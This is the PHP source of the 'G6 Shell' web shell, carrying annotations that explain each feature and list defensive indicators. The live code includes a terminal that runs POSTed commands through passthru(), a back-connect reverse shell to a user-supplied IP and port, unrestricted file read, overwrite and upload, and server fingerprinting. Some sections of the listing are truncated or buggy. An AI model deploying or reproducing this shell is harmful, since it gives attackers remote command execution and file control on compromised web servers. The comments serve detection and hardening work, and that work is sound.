".$ShellTitle.""; function get_srv_info(){ echo "
G6 Shell v1.0 - Public";
// get_srv_info() (the enclosing function) prints the banner that nearly every
// branch of this script emits first: the title above, then the server name,
// server IP, this script's own path on disk (SCRIPT_FILENAME) and the server
// software string, all read from $_SERVER. It takes no arguments and returns
// nothing.
// NOTE(review): the HTML inside these string literals appears to have been
// stripped from the listing, so labels such as [WHOIS] are bare text here.
echo "
Server Name: ".$_SERVER["SERVER_NAME"]."
Server IP: ".$_SERVER["SERVER_ADDR"]." [WHOIS] - [TRACEROUTE]
". "Shell Location: ".$_SERVER["SCRIPT_FILENAME"]."
Server Software: ".$_SERVER["SERVER_SOFTWARE"]." [Exploit DB]
"; echo "

"; }
// Request parameters. Several GET keys are unpadded base64 of a feature name
// ('dXBsb2Fk' decodes to "upload", 'ZmlsZV9leHBsb3Jlcg' to "file_explorer",
// 'bWtkaXI' to "mkdir"), which keeps plain words out of the query string.
// For defenders these fixed tokens are usable indicators when searching web
// access logs or writing WAF/IDS rules.
$upload = $_GET['dXBsb2Fk']; $downloadfilename = $_GET['ZG93bg']; $delete = $_GET['delete']; $file_explorer = $_GET['ZmlsZV9leHBsb3Jlcg']; $mkdir = $_GET['bWtkaXI'];
// Navigation menu: one entry per feature, each selected by its query-string token.
$NavLinks = array( array( "name" => "Main", "url" => "?" ), array( "name" => "Server Information", "url" => "?c3J2aW5mbw=" ), array( "name" => "File Explorer", "url" => "?ZmlsZV9leHBsb3Jlcg=".dirname(__FILE__)."/" ), array( "name" => "Terminal", "url" => "?dGVybWlhbmw" ), array( "name" => "Hash Identifier", "url" => "?aGk=" ), array( "name" => "BackConnect", "url" => "?YmNrbmV0=" ), array( "name" => "Shell-101", "url" => "?a253aXN1ZQ" ) );
// Feature dispatch below is a substring match (strstr) against the full
// request URL, so any request whose host or URI contains one of the tokens
// selects that branch. No authentication or access check is visible in this
// excerpt.
$CurrentUrl = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $last = count($NavLinks) - 1;
foreach($NavLinks as $NavLink => $NavRow){ $linknames = ($NavLink == 0); $linkurls = ($NavLink == $last); echo ''.$NavRow['name'].' / '; }
// "readfile" branch: takes a path from the request's 'readfile' parameter and,
// if it names a regular file, loads its contents into $Finalsource (the markup
// that presumably displays it has been stripped from this listing). The path
// is not restricted to any directory, so any file readable by the web-server
// account can be read through this branch.
if(strstr($CurrentUrl, "readfile")){ $sourcefile = $_REQUEST['readfile']; if(is_file($sourcefile)){ get_srv_info(); if(isset($sourcefile)) { $Finalsource = file_get_contents($sourcefile); echo "

"; } }else{ echo "Data not sent."; }
// Save handler (still inside the "readfile" branch): when the POST field
// 'save' is present, the file named by the 'readfile' parameter is opened in
// 'w' mode and overwritten with the POSTed 'sourcecode' value. Combined with
// the read above this is a read/write primitive over any file the web-server
// account can modify. Restrictive ownership and permissions on application
// files and file-integrity monitoring limit it and make its use visible.
if(isset($_POST['save'])){ $new_source = $_POST['sourcecode']; $source_edit = fopen($sourcefile, 'w'); fwrite($source_edit, $new_source); fclose($source_edit); }
// "LIa87yob" branch: prints the banner and a form labelled "Url:". The form
// markup and any handler for it are not visible in this listing.
}elseif(strstr($CurrentUrl, "LIa87yob")){ get_srv_info(); echo '
Url:
';
// "aGk" branch (base64 of "hi"; the menu labels it "Hash Identifier").
}elseif(strstr($CurrentUrl, "aGk")){ get_srv_info(); echo "

G6 hash identifier is able to identify MD5, SHA-1, MySQL5, DES(Unix), SHA-256, SHA-384, SHA-512, MD5(Unix), MD5(APR), MD5(phpBB3), MD5(Wordpress), SHA-256(Unix), SHA-512(Unix) and MD5(Base-64).

";
// Hash identifier: labels the POSTed 'hash' value by its string length and,
// for some lengths, by a marker substring such as '$1$' or '$apr1$'. Nothing
// is verified or computed here; the outcome is only a text label placed in
// $hashresult, which is interpolated into the page further down.
if(isset($_POST['gethash'])){ $hash = $_POST['hash']; if(strlen($hash)==32){ $hashresult == "MD5 Hash"; }elseif(strlen($hash)==40){ $hashresult = "SHA-1 Hash/ /MySQL5 Hash"; }elseif(strlen($hash)==13){ $hashresult = "DES(Unix) Hash"; }elseif(strlen($hash)==16){ $hashresult = "MySQL Hash / /DES(Oracle Hash)"; }elseif(strlen($hash)==41){ $GetHashChar = substr($hash, 40); if($GetHashChar == "*"){ $hashresult = "MySQL5 Hash"; } }elseif(strlen($hash)==64){ $hashresult = "SHA-256 Hash"; }elseif(strlen($hash)==96){ $hashresult = "SHA-384 Hash"; }elseif(strlen($hash)==128){ $hashresult = "SHA-512 Hash"; }elseif(strlen($hash)==34){ if(strstr($hash, '$1$')){ $hashresult = "MD5(Unix) Hash"; } }elseif(strlen($hash)==37){ if(strstr($hash, '$apr1$')){ $hashresult = "MD5(APR) Hash"; } }elseif(strlen($hash)==34){ if(strstr($hash, '$H$')){ $hashresult = "MD5(phpBB3) Hash"; } }elseif(strlen($hash)==34){ if(strstr($hash, '$P$')){ $hashresult = "MD5(Wordpress) Hash"; } }elseif(strlen($hash)==39){ if(strstr($hash, '$5$')){ $hashresult = "SHA-256(Unix) Hash"; } }elseif(strlen($hash)==39){ if(strstr($hash, '$6$')){ $hashresult = "SHA-512(Unix) Hash"; } }elseif(strlen($hash)==24){ if(strstr($hash, '==')){ $hashresult = "MD5(Base-64) Hash"; } }else{ $hashresult = "Hash type not found"; } }else{ $hashresult = "Not Hash Entered"; } echo '
Enter Hash:
Result: '.$hashresult.'
';
// "dXBsb2Fk" branch (base64 of "upload"): the file upload page.
}elseif(strstr($CurrentUrl, "dXBsb2Fk")){ get_srv_info(); echo '

G6 File Uploader


'; echo '
Path:
';
// Upload handler: moves the uploaded file to $_POST['path'] concatenated with
// the client-supplied file name. $errors is created empty and never filled,
// so no type, size or destination check runs before move_uploaded_file();
// a file of any type can be placed in any directory the web-server account
// can write to.
// Defensive relevance: multipart POSTs to a URL carrying the 'dXBsb2Fk'
// token, and new script files appearing under the web root, are the traces
// this leaves. Serving upload directories without script execution and
// keeping the web root non-writable for the server account both limit it.
if(isset($_FILES['file'])){ $errors = array(); $file_name = $_FILES['file']['name']; $file_tmp = $_FILES['file']['tmp_name']; if(empty($errors)){ if (move_uploaded_file($file_tmp, $_POST['path'].$file_name)){ echo "Upload Complete"; } } else { foreach($errors as $error){ echo $error.'
'; } } }
// "YmNrbmV0" branch (the menu labels it "BackConnect").
}elseif(strstr($CurrentUrl, "YmNrbmV0")){ get_srv_info(); echo '

Back Connect

Back connect will allow you to enter system commands remotely.

IP Address:
Port:
';
// Back-connect handler: when the POST field 'bind' is present the script
// lifts PHP's execution time limit and opens an outbound TCP connection to
// the client-supplied 'ip' and 'port'.
if(isset($_POST['bind'])) { ini_set('max_execution_time', 0); echo "

Attempting Connection...

"; $ip = $_POST['ip']; $port= $_POST['port']; $sockfd=fsockopen($ip , $port , $errno, $errstr ); if($errno != 0) { echo "$errno : $errstr"; } else if (!$sockfd) { $result = "

Unexpected error has occured, connection may have failed.

"; } else {
// Connected: a text banner is written to the socket, then the loop reads one
// line at a time from the remote end, passes it to shell_exec() and writes
// the output back. The remote end thereby gets an interactive command
// channel running as the web-server account, over a connection the server
// itself initiated (so inbound-only firewall rules do not block it).
// Defensive relevance: egress filtering for web servers, alerting on outbound
// connections or shell child processes started by the PHP / web-server
// process, and listing shell_exec and passthru in php.ini disable_functions
// where the application does not need them.
fputs ($sockfd , "\n{################################################################}\n ..:: G6 W3b Sh3ll v1.0- Coded By Mr. P-teo ::..\n\n => Backconnect \n => Back \n \n{################################################################}"); $pwd = shell_exec("pwd"); $sysinfo = shell_exec("uname -a"); $time = Shell_exec("time"); $len = 1337; fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n\n"); while(!feof($sockfd)) { $cmdPrompt = '[G6]#:> '; fputs ($sockfd , $cmdPrompt ); $command= fgets($sockfd, $len); fputs($sockfd , "\n" . shell_exec($command) . "\n\n"); } fclose($sockfd); } } echo "

";
// "bWtmbA" branch (base64 of "mkfl"): the create-file page.
}elseif(strstr($CurrentUrl, "bWtmbA")){ get_srv_info(); echo "

If no file path is included it will be created within the same directory as the shell.

Filename:

";
// Create-file handler: when the POST field 'create' is present, opens the
// client-supplied 'newfilename' path in 'w' mode and closes it again, which
// creates the file or truncates an existing one to zero length.
// htmlentities() only HTML-encodes the value; it does not confine the path
// to any directory.
$newfilename = htmlentities($_POST['newfilename']); if(isset($_POST['create'])){ $ourFileName = $newfilename; $ourFileHandle = fopen($ourFileName, 'w') or die("can't open file"); fclose($ourFileHandle); } echo "


Coded By Mr. P-teo

";
// "bWtkaXI" branch (base64 of "mkdir"): the create-directory page.
}elseif(strstr($CurrentUrl, "bWtkaXI")){ get_srv_info(); echo "

If no file path is included directory will be created within the same directory as the shell.

Directory Name:

";
// Create-directory handler: when the POST field 'createdir' is present,
// creates the client-supplied 'newdirname' path with mode 0777 requested
// (world-writable, subject to the process umask). As with file creation,
// htmlentities() is HTML encoding, not path validation.
$newdirname = htmlentities($_POST['newdirname']); if(isset($_POST['createdir'])){ $ourdirName = $newdirname; mkdir($ourdirName, 0777); echo "Directory Created!"; } echo "


Coded By Mr. P-teo

";
// "ZmlsZV9leHBsb3Jlcg" branch (base64 of "file_explorer"): directory browser.
// The directory to list comes from the GET parameter of the same name.
}elseif(strstr($CurrentUrl, "ZmlsZV9leHBsb3Jlcg")){ get_srv_info(); $upload = $file_explorer; echo '

';
// "Go to directory" form: redirects the browser to the explorer URL for the
// POSTed 'chdir' value. The value is placed in the Location header as-is.
// NOTE(review): the listing code that follows the closing tag is incomplete
// in this copy of the file.
if(isset($_POST['godir'])){ $mandircha = $_POST['chdir']; if($mandircha){ header("Location: ?ZmlsZV9leHBsb3Jlcg=".$_POST['chdir']); } } ?>

?".$perm.""; } $type = Filetype($filename); $mod = date("F j, g:i a", filemtime($filename)); $filesize = round(filesize($filename) / 1024, 2); if($file_explorer == $_SERVER['DOCUMENT_ROOT']."/"){ if($filename == ".."){ $file_explorer = substr($file_explorer, 0, strrpos($file_explorer, "/")); echo ""; }elseif($filename == "."){ $file_explorer = substr($file_explorer, 0, strrpos($file_explorer, "/")); echo ""; }else{ $file_explorer = $_GET['ZmlsZV9leHBsb3Jlcg']; echo ""; } }else{ if($filename == ".."){ $file_explorer = substr($file_explorer, 0, strrpos($file_explorer, "/")); echo ""; }elseif($filename == "."){ $file_explorer = substr($file_explorer, 0, strrpos($file_explorer, "/")); echo ""; }else{ $file_explorer = $_GET['ZmlsZV9leHBsb3Jlcg']; echo ""; } } } } ?>
FileName's Filetype Size Permisions Options
".$filename."
".$type."
".$filesize."Kb
".$perm."
".$filename."
".$type."
".$filesize."Kb
".$perm."
".$filename."
".$type."
".$filesize."Kb
".$perm."
edit | del |
".$filename."
".$type."
".$filesize."Kb
".$perm."
".$filename."
".$type."
".$filesize."Kb
".$perm."
".$filename."
".$type."
".$filesize."Kb
".$perm."
edit | del |



Coded By Mr. P-teo

[ON"; }else{ $s_safemode = "[OFF"; }
// Server-information page (its opening lines are missing from this copy).
// It reports whether the curl extension is loaded, the server port, the
// HTTP Connection header, php_uname(), the magic-quotes setting, the PHP
// version and the safe-mode flag: a host fingerprint of the kind used to
// decide what else can be run on the machine.
// get_magic_quotes_gpc() and safe mode exist only in older PHP releases
// (the function was removed in PHP 8.0), which suggests the script was
// written for legacy installations.
if(extension_loaded('curl')){ $curls="[ON]"; }else{ $curls="[OFF]"; } echo " Server Port: ".$_SERVER['SERVER_PORT']."

HTTP Connection: ".$_SERVER['HTTP_CONNECTION']."

Operating System: ".php_uname()."

"; if(get_magic_quotes_gpc()){ echo "Magic Quotes: [ENABLED]

"; }else{ echo "Magic Quotes: [DISABLED]

"; } echo "PHP Version: ".phpversion()."

Safe Mode: ".$s_safemode."]


Curl: ".$curls."

Coded By Mr. P-teo

";
// "dGVybWlhbmw" branch (base64 of "termianl", sic; the menu labels it
// "Terminal"): command-execution page.
}elseif(strstr($CurrentUrl, "dGVybWlhbmw")){ get_srv_info(); //Needs more work. echo '
Command Execution:
';
// The POSTed 'command' field is handed to passthru() unchanged, so the
// request body is executed as a shell command under the web-server account
// and its raw output is sent straight into the HTTP response.
// Defensive relevance: POST requests with a 'command' field to a URL
// carrying the 'dGVybWlhbmw' token, and shell processes spawned by the
// PHP / web-server process, are the observable traces; disable_functions in
// php.ini can remove passthru where the application does not need it.
$out = array(); passthru($_POST['command'], $out); foreach ($out as $line) { echo "$line\n"; } echo '

Coded By Mr. P-teo

';
// "a253aXN1ZQ" branch (the menu labels it "Shell-101"): static page listing
// the author's known issues; it performs no action on the host.
}elseif(strstr($CurrentUrl, "a253aXN1ZQ")){ get_srv_info(); echo "

Information

G6 Shell v1.0 Open Beta Edition - coded by Mr. P-teo, below are the known issues and bugs.

  • Delete Directory With Contents.
  • When opening large files can run out of memory.
  • Create File/Dir requires directory path.
  • Editing can run into trouble with GET Method Not Implemented error.
  • Doesn't display contents of /home/ directory, needs url manipulation to get to the root folder.




Coded By Mr. P-teo

";
// Default branch: no known token matched the URL, so only the banner and a
// credit line are printed.
}else{ get_srv_info(); echo "



Public Shell Coded By Mr. P-teo




Coded By Mr. P-teo

"; }
// Flushes PHP's output buffer to the client; the matching ob_start() call is
// not visible in this excerpt.
ob_flush() ?>